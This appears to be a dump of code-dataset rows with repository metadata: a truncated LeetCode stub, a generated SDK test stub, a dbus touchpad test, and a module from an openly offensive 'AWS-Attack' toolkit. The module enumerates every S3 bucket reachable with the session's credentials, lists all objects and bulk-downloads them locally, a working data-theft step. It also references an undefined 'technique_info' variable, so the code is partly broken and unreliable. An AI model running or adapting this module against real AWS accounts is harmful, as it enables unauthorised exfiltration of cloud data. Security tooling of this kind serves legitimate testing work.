# I pick a number from 1 to n. You have to guess which number I picked.
#
# Every time you guess wrong, I'll tell you whether the number I picked is
# higher or lower.
#
# However, when you guess a particular number x, and you guess wrong, you pay
# $x. You win the game when you guess the number I picked.
#
# Example:
#
#
# n = 10, I pick 8.
#
# First round: You guess 5, I tell you that it's higher. You pay $5.
# Second round: You guess 7, I tell you that it's higher. You pay $7.
# Third round: You guess 9, I tell you that it's lower. You pay $9.
#
# Game over. 8 is the number I picked.
#
# You end up paying $5 + $7 + $9 = $21.
#
#
# Given a particular n ≥ 1, find out how much money you need to have to
# guarantee a win.
#
class Solution:
def getMoneyAmount(self, n: int) -> int:
| [
"[email protected]"
]
| |
510028271dd0273b95172ae8801f8c4076dd5a48 | 700c7801958dd4789caf94785b5dc8c5e3daa4fd | /ttp/src/s3_enum_bucket_src.py | 8b1c813243ec768cb7a2e4575bac6e14f2e45359 | [
"Apache-2.0",
"BSD-3-Clause"
]
| permissive | blackbotsecurity/AWS-Attack | 24d4cd6ebda067e9672f4f963d414a7b176e3551 | ad4668ab60173aabce3c6b9c7685160be5e3f14d | refs/heads/master | 2023-03-14T00:05:54.965341 | 2021-03-05T12:44:27 | 2021-03-05T12:44:27 | 331,603,794 | 14 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,507 | py | #!/usr/bin/env python3
import datetime
import argparse
import datetime
from copy import deepcopy
import os
from botocore.exceptions import ClientError
FILE_SIZE_THRESHOLD = 1073741824
def get_bucket_size(awsattack, bucket_name):
client = awsattack.get_boto3_client('cloudwatch', 'us-east-1')
response = client.get_metric_statistics(
Namespace='AWS/S3',
MetricName='BucketSizeBytes',
Dimensions=[
{'Name': 'BucketName', 'Value': bucket_name},
{'Name': 'StorageType', 'Value': 'StandardStorage'}
],
Statistics=['Average'],
Period=3600,
StartTime=datetime.datetime.today() - datetime.timedelta(days=1),
EndTime=datetime.datetime.now().isoformat()
)
if response['Datapoints']:
return response['Datapoints'][0]['Average']
return 0
def download_s3_file(awsattack, key, bucket):
session = awsattack.get_active_session()
base_directory = 'sessions/{}/downloads/{}/{}/'.format(session.name, technique_info['name'], bucket)
directory = base_directory
offset_directory = key.split('/')[:-1]
if offset_directory:
directory += '/' + ''.join(offset_directory)
if not os.path.exists(directory):
os.makedirs(directory)
s3 = awsattack.get_boto3_resource('s3')
size = s3.Object(bucket, key).content_length
if size > FILE_SIZE_THRESHOLD:
awsattack.print(' LARGE FILE DETECTED:')
confirm = awsattack.input(' Download {}? Size: {} bytes (y/n) '.format(key, size))
if confirm != 'y':
return False
try:
s3.Bucket(bucket).download_file(key, base_directory + key)
except Exception as error:
awsattack.print(' {}'.format(error))
return False
return True
def extract_from_file(awsattack, file):
files = {}
try:
with open(file, 'r') as bucket_file:
for line in bucket_file:
delimiter = line.rfind('@')
key = line[:delimiter]
bucket = line[delimiter + 1:-1]
files[key] = bucket
except FileNotFoundError:
awsattack.print(' Download File not found...')
return files
def write_bucket_keys_to_file(awsattack, objects):
awsattack.print(' Writing file names to disk...')
session = awsattack.get_active_session()
file = 'sessions/{}/downloads/{}/'.format(session.name, 's3_download_bucket')
if not os.path.exists(file):
os.makedirs(file)
file += '{}_file_names.txt'.format('s3_download_bucket')
try:
with open(file, 'w') as objects_file:
for key in objects:
for file in objects[key]:
objects_file.write('{}@{}\n'.format(file, key))
except Exception as error:
print(error)
return True
def main(args, awsattack_main, data=None):
technique_info = data
session = awsattack_main.get_active_session()
print = awsattack_main.print
input = awsattack_main.input
if (args.names_only is True and args.dl_names is True):
print('Only zero or one options of --names-only, and --dl-names may be specified. Exiting...')
return {}
# Download Objects from File
if args.dl_names:
awsattack_main.print(' Extracting files from file...')
extracted_files = extract_from_file(awsattack_main, args.dl_names)
total = len(extracted_files.keys())
success = 0
for key in extracted_files:
if download_s3_file(awsattack_main, key, extracted_files[key]):
success += 1
awsattack_main.print(' Finished downloading from file...')
return {'downloaded_files': success, 'failed': total - success}
# Enumerate Buckets
client = awsattack_main.get_boto3_client('s3')
buckets = []
print('Enumerating buckets...')
try:
response = client.list_buckets()
except ClientError as error:
code = error.response['Error']['Code']
if code == 'AccessDenied':
print(' FAILURE: MISSING AWS PERMISSIONS')
else:
print(code)
return {}
s3_data = deepcopy(session.S3)
s3_data['Buckets'] = deepcopy(response['Buckets'])
session.update(awsattack_main.database, S3=s3_data)
summary_data = {'buckets': len(response['Buckets'])}
for bucket in response['Buckets']:
buckets.append(bucket['Name'])
print(' Found bucket "{bucket_name}"'.format(bucket_name=bucket['Name']))
# Process Enumerated Buckets
print('Starting enumerating objects in buckets...')
summary_data['readable_buckets'] = 0
objects = {}
for bucket in buckets:
paginator = client.get_paginator('list_objects_v2')
page_iterator = paginator.paginate(Bucket=bucket)
objects[bucket] = []
try:
for page in page_iterator:
if 'Contents' in page:
keys = [key['Key'] for key in page['Contents']]
objects[bucket].extend(keys)
summary_data['readable_buckets'] += 1
except ClientError as error:
print(' Unable to read bucket')
code = error.response['Error']['Code']
print(code)
continue
continue
# Enumerated buckets and associated list of files
print('Finished enumerating objects in buckets...')
summary_data['objects'] = objects
write_bucket_keys_to_file(awsattack_main, objects)
return summary_data
| [
"[email protected]"
]
| |
17f8fab62badcdbbb88d5cfd0c6c4506f86e6b50 | fa7c302f7df6b1773b27de3b742d551bd54aa4e2 | /test/test_input_device_all_of.py | 611ab21c2acb46f2c420d439e774eb725eb3aeaa | []
| no_license | cons3rt/cons3rt-python-sdk | d01b3b174c295491130fba0d76d046b16492e9f7 | f0bcb295735ac55bbe47448fcbd95d2c7beb3ec0 | refs/heads/master | 2021-11-04T02:31:54.485541 | 2021-10-26T19:28:57 | 2021-10-26T19:28:57 | 241,673,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 879 | py | # coding: utf-8
"""
CONS3RT Web API
A CONS3RT ReSTful API # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import cons3rt
from cons3rt.models.input_device_all_of import InputDeviceAllOf # noqa: E501
from cons3rt.rest import ApiException
class TestInputDeviceAllOf(unittest.TestCase):
"""InputDeviceAllOf unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testInputDeviceAllOf(self):
"""Test InputDeviceAllOf"""
# FIXME: construct object with mandatory attributes with example values
# model = cons3rt.models.input_device_all_of.InputDeviceAllOf() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
]
| |
f9c6490f5ece41b650d48ea79d24c13544978d7d | f68732bc40a7a90c3a1082e4b3a4154518acafbb | /script/dbus/sessionBus/inputDeviceTouchPad/011_palmMinWidth.py | 2aa00b420156397e97ca272516be555d2391a05b | []
| no_license | lizhouquan1017/dbus_demo | 94238a2307e44dabde9f4a4dd0cf8ec217260867 | af8442845e722b258a095e9a1afec9dddfb175bf | refs/heads/master | 2023-02-11T19:46:27.884936 | 2021-01-08T05:27:18 | 2021-01-08T05:27:18 | 327,162,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 902 | py | # -*- coding: utf-8 -*-
# ***************************************************
# @Test Case ID: 011_palmMinWidth
# @Test Description: int32 PalmMinWidth (readwrite) 手掌误触最小宽度
# @Test Condition: 1.无
# @Test Step: 1.调用接口读取 PalmMinWidth 属性值
# @Test Result: 1.返回 int32 数据类型数据
# @Test Remark:
# @Author: ut001627
# ***************************************************
import time
import pytest
from frame.base import OSBase
from aw.dbus.sessionBus import inputDeviceTouchPad
class TestCase(OSBase):
def setUp(self):
self.Step("预制条件1:无")
@pytest.mark.public
def test_step(self):
self.Step("步骤1:调用接口读取 PalmMinWidth 属性值")
inputDeviceTouchPad.palmMinWidth()
def tearDown(self):
self.Step("收尾:无")
time.sleep(2)
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.